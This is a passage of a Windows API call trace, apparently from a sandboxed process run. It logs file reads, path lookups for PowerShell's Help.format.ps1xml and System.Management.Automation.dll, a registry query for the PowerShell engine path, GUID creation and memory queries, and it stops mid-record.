[0078.651] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.651] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.651] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.652] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.652] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.652] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.656] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.656] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.656] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.657] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.657] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.657] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.658] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.658] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.658] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.658] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.659] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.659] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.659] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.659] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.659] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.659] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.660] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.660] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.660] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.660] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.661] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.661] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.661] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.661] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.662] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.662] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.662] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.662] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.662] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.663] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.663] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0xf37, lpOverlapped=0x0) returned 1 [0078.663] ReadFile (in: hFile=0x310, lpBuffer=0x36a1ef7, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a1ef7*, lpNumberOfBytesRead=0xcccf8*=0x0, lpOverlapped=0x0) returned 1 [0078.663] ReadFile (in: hFile=0x310, lpBuffer=0x36a2858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x36a2858*, lpNumberOfBytesRead=0xcccf8*=0x0, lpOverlapped=0x0) returned 1 [0078.663] CloseHandle (hObject=0x310) returned 1 [0078.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0078.664] SetErrorMode (uMode=0x1) returned 0x1 [0078.664] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccca0 | out: lpFileInformation=0xccca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0078.664] SetErrorMode (uMode=0x1) returned 0x1 [0078.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0078.665] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xccd88 | out: phkResult=0xccd88*=0x310) returned 0x0 [0078.665] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd0c, lpData=0x0, lpcbData=0xccd08*=0x0 | out: lpType=0xccd0c*=0x1, lpData=0x0, lpcbData=0xccd08*=0x56) returned 0x0 [0078.665] CoTaskMemAlloc (cb=0x5a) returned 0x1b8f0310 [0078.665] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcccdc, lpData=0x1b8f0310, lpcbData=0xcccd8*=0x56 | out: lpType=0xcccdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcccd8*=0x56) returned 0x0 [0078.665] CoTaskMemFree (pv=0x1b8f0310) [0078.665] RegCloseKey (hKey=0x310) returned 0x0 [0078.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0078.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0078.677] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x3db44224, Data2=0x8098, Data3=0x4eae, Data4=([0]=0xb8, [1]=0xd2, [2]=0xdb, [3]=0x50, [4]=0x33, [5]=0x79, [6]=0xe2, [7]=0x26))) returned 0x0 [0078.677] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x55a75b4d, Data2=0x4cc, Data3=0x4589, Data4=([0]=0x9a, [1]=0xa0, [2]=0xd4, [3]=0x2e, [4]=0xb9, [5]=0xf9, [6]=0x1c, [7]=0x7d))) returned 0x0 [0078.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.744] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x2392f313, Data2=0x675b, Data3=0x4670, Data4=([0]=0xa2, [1]=0x49, [2]=0xfe, [3]=0xa, [4]=0xfe, [5]=0x6b, [6]=0xc2, [7]=0x99))) returned 0x0 [0078.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.749] VirtualQuery (in: lpAddress=0xcafc0, lpBuffer=0xcbe80, dwLength=0x30 | out: lpBuffer=0xcbe80*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.751] VirtualQuery (in: lpAddress=0xcb050, lpBuffer=0xcbf10, dwLength=0x30 | out: lpBuffer=0xcbf10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: 